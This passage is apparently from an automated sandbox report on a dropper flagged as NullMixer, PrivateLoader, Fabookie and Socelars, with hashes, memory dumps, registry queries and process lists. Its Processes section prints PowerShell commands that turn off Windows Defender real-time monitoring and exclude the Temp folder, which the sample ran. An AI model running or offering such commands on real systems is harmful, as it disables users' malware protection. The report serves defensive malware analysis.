| SHA512 | 40b268d0c1181ea950f4f7b3fa3bf10bcb84330047657ba2c1adec4c4e5f99b24d988086730bdebe3176e8e2d26fe841a4feaf9376c0d002fdb77291e97f7f6e |
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon164c5af508c3.exe
| MD5 | 3ede4ea9236fb79e46017591d7fa89ba |
| SHA1 | a064bb878b2d4f136dadeb061f7321bfc617355b |
| SHA256 | e41420775c1b48d6c59060a40002802bfd41195368c9c30130ce9ad83bb3f169 |
| SHA512 | 7a7acce6cd4a8801885336d0dd5100ed3c925f9676c77c7192c7c54bc010dbb8cbc9e9b03bdba1ac6125f3139ab1a5d363cbab00b68b8b97ff6647a9cc5df434 |
memory/2860-109-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon161bd381a14aea5c.exe
| MD5 | cf7a094bc477eeba7e8d568f12bf0ba9 |
| SHA1 | 4b9bca3bd6d3d1125dbd13993d0c4118e479ae79 |
| SHA256 | 4960c14c5b5a9d4abf64ef2cf3d2357403ad7ab5173bf5f063f162557bbfe2e5 |
| SHA512 | f9e0579878f649f1588435c0bc8846d84058666aebd6f676b1e9ec51950375360b01333e073d7e7cdcbe683f78bb6de7f945d8e2d3290ba9dd4512480e6d25da |
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16ac385cfd.exe
| MD5 | 0b8ef03e8c9752a88faa2907a62d0783 |
| SHA1 | 283b229a5c68528363ab3595ea8b5b37025fb1ec |
| SHA256 | 63ddcac0ee5ecd7239cb817b176480275ad3f6fc9bfb1f4a3086d19e578da4ea |
| SHA512 | bccb76031a7df528ebed8d3c33d5ea8f2bdd69858e26931e8ad348a3805fdfd9b377ae416c087fa6959c899fb17f9d1561773ac06aa6b803b8e73bc9832468ec |
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe
| MD5 | 314e3dc1f42fb9d858d3db84deac9343 |
| SHA1 | dec9f05c3bcc759b76f4109eb369db9c9666834b |
| SHA256 | 79133c9e1cdfdfada9bc3d49ba30d872c91383eb7515302cd7bd2e1c5b983b08 |
| SHA512 | 23f6c8f785c6d59d976d437732d1ea5968403239c5f8c3ca83983d1a0b3d9f8426803b7de7c2e819d16a1fb35f9e24461593fdcc75cd81ddc0076c22ed1e45f2 |
\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe
| MD5 | 58267e9b25e8df4530d4e7b4e8b273c0 |
| SHA1 | bb08b8638013fd6ac7fb30f0d674a0ada0dab5ac |
| SHA256 | dce7b289556aa5027cd166ce2916b0d25081377071c3428609f6368d1d26e1ef |
| SHA512 | 488f40ce734197fa4aa36bda91a9283ddabfc41117f367a3643bebecb6bb5f43e170c4804989a934fa3cc25d1a07559b1e1abf14d3efc0aacc3323280c3cbec3 |
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe
| MD5 | ebf343da80ba03d41832a6f1178940f8 |
| SHA1 | 06b5689406be75fe9b6ff3b6ba68d712f6597819 |
| SHA256 | 85dfc3e1c3748a6a48b0b1b34df6853d68e26ce12c13463a9b0f2cc899260bd5 |
| SHA512 | 5c971e9eccc7bcca8a77c46ba7f9ff1765eecf243146f805eb90809e3bd28e4b4038150bf7f95fa19ea5b90f77af5c1f4916093df13b3b732dff8aeee68755c4 |
\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe
| MD5 | 917921d15cb0e081cc589fb8623cbfdc |
| SHA1 | a8c5dc84e100aea9c9de8b2e76c6469d0de8c747 |
| SHA256 | c2496991fe4a847ed5585f00e8fdf2dc9fc679636f5e9e4add9086649bb24717 |
| SHA512 | 8eff74f2ba55392c0bb33159aa367cccede62eda00c0ef03b2f05ee42cdeb41341f780c6757b997b87a0e2336e3f31135b24b72865d69e449623a230a781d3ba |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 6c41d65cc641e21398d68075326c9a5e |
| SHA1 | 946ac9b57ed3076ed9e9ec17c05a931a5f56bdd6 |
| SHA256 | 972db3356bf538976e613b0c0c582472ea672cb8a0d5c2976ce9b546c4904036 |
| SHA512 | 3c8e981d882267f67d52f54461f24312ed4adc97bc697938b816b3461f7b17e82c433693c6bf10669ec8f5b4bf4a9472ad9f741088750726a21bbf097d66b940 |
memory/2368-172-0x0000000000400000-0x000000000042F000-memory.dmp
memory/2572-168-0x0000000002850000-0x0000000002F4D000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16b7581baf7.exe
| MD5 | b33a3fb6b491b328dacaf18c302b20de |
| SHA1 | 41281e81ec9ba49af4af18f3c61038e62818d3c6 |
| SHA256 | 088d635941437ab637abea3d698c71dedf0f24d5dffd62f6b1fe4329b8e7de72 |
| SHA512 | a247cf6aa60d3cbacc46242a51793c6a6e3a3c00c1276af6b59d6b60ffb40d7915b09a9169a521f4326ecc622be29e71fb4cbe705f52e4e28e5d5802630b793e |
memory/804-188-0x00000000011F0000-0x00000000018ED000-memory.dmp
memory/804-182-0x00000000011F0000-0x00000000018ED000-memory.dmp
memory/956-186-0x0000000000400000-0x00000000004D8000-memory.dmp
memory/1928-183-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2016-192-0x0000000001320000-0x0000000001388000-memory.dmp
memory/1508-194-0x0000000000E00000-0x0000000000E68000-memory.dmp
memory/1448-193-0x00000000000B0000-0x00000000000F2000-memory.dmp
memory/804-197-0x0000000000400000-0x0000000000AFD000-memory.dmp
memory/1784-201-0x00000000011D0000-0x00000000011D8000-memory.dmp
memory/1928-244-0x0000000000400000-0x0000000000414000-memory.dmp
memory/804-238-0x0000000000400000-0x0000000000AFD000-memory.dmp
memory/804-237-0x0000000003C80000-0x0000000003C81000-memory.dmp
memory/804-235-0x0000000003C80000-0x0000000003C81000-memory.dmp
memory/2836-245-0x0000000000400000-0x0000000000414000-memory.dmp
memory/804-232-0x0000000003000000-0x0000000003001000-memory.dmp
memory/804-230-0x0000000003000000-0x0000000003001000-memory.dmp
memory/804-227-0x0000000002F50000-0x0000000002F51000-memory.dmp
memory/804-225-0x0000000002F50000-0x0000000002F51000-memory.dmp
memory/804-222-0x0000000002EA0000-0x0000000002EA1000-memory.dmp
memory/804-220-0x0000000002EA0000-0x0000000002EA1000-memory.dmp
memory/804-217-0x00000000029E0000-0x00000000029E1000-memory.dmp
memory/804-215-0x00000000029E0000-0x00000000029E1000-memory.dmp
memory/804-213-0x00000000029E0000-0x00000000029E1000-memory.dmp
memory/804-212-0x0000000000D00000-0x0000000000D01000-memory.dmp
memory/804-210-0x0000000000D00000-0x0000000000D01000-memory.dmp
memory/804-208-0x0000000000D00000-0x0000000000D01000-memory.dmp
memory/1948-243-0x0000000000400000-0x00000000004BD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-VI925.tmp\Mon16737798ac26f984.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe
| MD5 | 7d7f14a1b3b8ee4e148e82b9c2f28aed |
| SHA1 | 649a29887915908dfba6bbcdaed2108511776b5a |
| SHA256 | 623a56a34174f3dcb179796205294124918996ccc8b56062b419ab8354df35cb |
| SHA512 | 585dda13cda86d077d28cdfbe799d4356967394e09a17e3ce406f557d14ec24f6b6cbdf0a7b2beaaae8743b2c545b898a12eeeeb56579b8fa560202a290370d3 |
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe
| MD5 | b84f79adfccd86a27b99918413bb54ba |
| SHA1 | 06a61ab105da65f78aacdd996801c92d5340b6ca |
| SHA256 | 6913b6cc93ab1fb509ab7459d6158be6f1b03ab06d2ed41782b86838bd504c49 |
| SHA512 | 99139ce83106810b213e1d89a2d017e824859a48784c9b04adf08314eeacc20b8b22e64349f4609eaf8d47b8a3c35b0fb3b4a270c29f090d2e4d3e3ca3455f38 |
C:\Users\Admin\AppData\Local\Temp\is-MAFVS.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
memory/2860-108-0x0000000064940000-0x0000000064959000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-MAFVS.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
memory/2860-107-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2860-106-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2860-104-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2860-100-0x0000000000400000-0x000000000051C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16ad13d7ad1b02.exe
| MD5 | 6881c116d2a78c375de73a298a732427 |
| SHA1 | 36112627325603afc821d28b2da69f7da58e27ab |
| SHA256 | c15359f15f0402b2db3b3704d0bacee6996c04bc1f37195eb02ac30cf2fc5844 |
| SHA512 | 598cc49d79c236f6fc493438cd103e367c477480adf10f279613767536762c67c1b712bb00fb620c535647f1e002d88d0cba60cab02ef602be8e7bc009c0d728 |
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16bd4a93b822a.exe
| MD5 | 34025b6eb0aa1236b91ca1ab765acbd3 |
| SHA1 | cfb12b89aa55158e7b0b38f8fd5b8bf590660793 |
| SHA256 | db3c03a5f74e0e9114883bb5c0db60abb4f32e4712e32a953179f0626c529b14 |
| SHA512 | d5d4cf4f3dcdc79ae92792307ee82922af55bdc4d81708c140c03c1979da3b8e2d0f009ddde6f680a0197ab7668824dab81393ba9bca6533a603eddd30e22fdd |
memory/2860-79-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2860-78-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2860-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2860-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2860-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/1448-260-0x0000000000450000-0x000000000047E000-memory.dmp
memory/316-275-0x0000000002320000-0x00000000027DA000-memory.dmp
memory/316-276-0x0000000001E60000-0x0000000001F0E000-memory.dmp
memory/316-280-0x0000000002C70000-0x0000000002D0B000-memory.dmp
memory/316-278-0x0000000002C70000-0x0000000002D0B000-memory.dmp
memory/316-277-0x0000000002C70000-0x0000000002D0B000-memory.dmp
memory/2132-293-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1868-311-0x0000000000400000-0x0000000000420000-memory.dmp
memory/804-319-0x0000000000400000-0x0000000000AFD000-memory.dmp
memory/804-321-0x00000000011F0000-0x00000000018ED000-memory.dmp
memory/1596-361-0x0000000000400000-0x0000000000420000-memory.dmp
C:\Program Files (x86)\Gparted\Build.exe
| MD5 | c874508845d1c0bb486f5e41af8de480 |
| SHA1 | 3ac7e246934ba74c1018d50138bea77b035d6f90 |
| SHA256 | 4793a9e954f00007a2f352648cddbc30add3ff4b7f22c3e1500d3671b0eb36be |
| SHA512 | 80daa52fea184748c4b858af4c7a676dddddf4c3cfdfada44917abddb0495ab22a9728800ea7f408fb3e66c269eda9df2462a9f82cf6a57c254d6c233c46f758 |
memory/3000-392-0x0000000000230000-0x0000000000238000-memory.dmp
memory/3000-391-0x0000000001220000-0x0000000001242000-memory.dmp
C:\Program Files (x86)\Gparted\gimagex.exe
| MD5 | 85199ea4a530756b743ad4491ea84a44 |
| SHA1 | 0842cd749986d65d400a9605d17d2ed7a59c13cc |
| SHA256 | 3ea24d7899169c28d505233e13b9c92b51cd1181be299487392700d29e13b9aa |
| SHA512 | b82b1c0ba24fa3e4c1f5309eee4cc6be0dfcc20f64886a40e4eb35d804f36af864b3e4218d7f27f439fa45659af0d69410798c9b3d1e5cab5a259759b7ad1f99 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SDK23TBKX6BDNIQIPQ1Y.temp
| MD5 | 293d0416bcda13e1649de81d3b609bb2 |
| SHA1 | 0a43e1dd48c95a4b2ddfab5f34f4b7f8b1ed03c4 |
| SHA256 | 1af6038dba0c86e9014d26c848d12d78d2739c786abb7fc0956536b210b8c196 |
| SHA512 | 503945513122def7d71479b0bc6e822b32f924abae41f3ceda174693f408d99c3e3e32636015747e36ecddbee60844a9ca87817af3ab456ada34415fb80dabfb |
memory/2756-442-0x0000000140000000-0x00000001405E8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 1afff8d5352aecef2ecd47ffa02d7f7d |
| SHA1 | 8b115b84efdb3a1b87f750d35822b2609e665bef |
| SHA256 | c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1 |
| SHA512 | e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb |
memory/2756-447-0x0000000140000000-0x00000001405E8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab454A.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar517B.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
| MD5 | fd2727132edd0b59fa33733daa11d9ef |
| SHA1 | 63e36198d90c4c2b9b09dd6786b82aba5f03d29a |
| SHA256 | 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e |
| SHA512 | 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e |
C:\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
| MD5 | fafbf2197151d5ce947872a4b0bcbe16 |
| SHA1 | a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020 |
| SHA256 | feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71 |
| SHA512 | acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-06 10:40
Reported
2024-11-06 10:43
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe
"C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe"
C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon166dc6040fb8726.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon16bd4a93b822a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon1661118952.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon16b7581baf7.exe /mixtwo
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon167f9db638e4.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon16ad13d7ad1b02.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon1618e4439d986270.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon1631358b82299bd8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon16d070a064013c841.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon16734014a69dec.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon16737798ac26f984.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon164c5af508c3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon16957e622fa390.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon16ac385cfd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon16e127a54386dd68.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon161bd381a14aea5c.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe
| MD5 | 0c0e1a604e0da52b76b20bc2adba8192 |
| SHA1 | c6df017caaebdfbf3d86b022570aeb6c2cee1f3a |
| SHA256 | a8e57cdcd0fa1640cde72c232cd5c3b07be08f2ac5ed88d78dcc93b627c935e2 |
| SHA512 | 797568375efa0902493cadffa79ad0638a34d3cda2ae961557fe9c77c463a9ffd4a40695464aeaf19a3be7f29c085538e0e1eaac52e7c15a1de95b2db2621d8e |
C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
memory/1416-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1416-79-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/1416-78-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2308-80-0x000000007335E000-0x000000007335F000-memory.dmp
memory/1416-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2264-82-0x0000000073350000-0x0000000073B00000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon161bd381a14aea5c.exe
